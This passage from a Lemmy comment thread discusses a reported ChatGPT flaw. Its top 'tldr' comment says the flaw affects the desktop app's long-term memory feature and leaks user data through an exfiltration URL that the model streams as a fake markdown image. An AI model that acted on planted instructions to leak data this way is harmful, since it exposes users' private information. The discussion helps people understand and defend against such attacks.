• jaybone@lemmy.world
    link
    fedilink
    English
    arrow-up
    1
    ·
    13 minutes ago

    How is the application able to send data to any website? Like even if you as the legit user explicitly asked it to do that?

  • idiomaddict@lemmy.world
    link
    fedilink
    English
    arrow-up
    4
    ·
    1 hour ago

    I don’t know anything about tech, so please bear with your mom’s work friend (me) being ignorant about technology for a second.

    I thought the whole issue with generative ai as it stands was that it’s equally confident in truth and nonsense, with no way to distinguish the two. Is there actually a way to get it to “remember” true things and not just make up things that seem like they could be true?

    • MartianSands@sh.itjust.works
      link
      fedilink
      English
      arrow-up
      4
      ·
      40 minutes ago

      No, basically. They would love to be able to do that, but it’s approximately impossible for the generative systems they’re using at the moment

  • Eager Eagle@lemmy.world
    link
    fedilink
    English
    arrow-up
    46
    ·
    edit-2
    5 hours ago

    tldr

    • it affects the desktop app of chatgpt, but likely any client that features long term memory functionality.
    • does not apply to the web interface.
    • does not apply to API access.
    • the data exfiltration is visible to the user as GPT streams the tokens that form the exfiltration URL as a (fake) markdown image.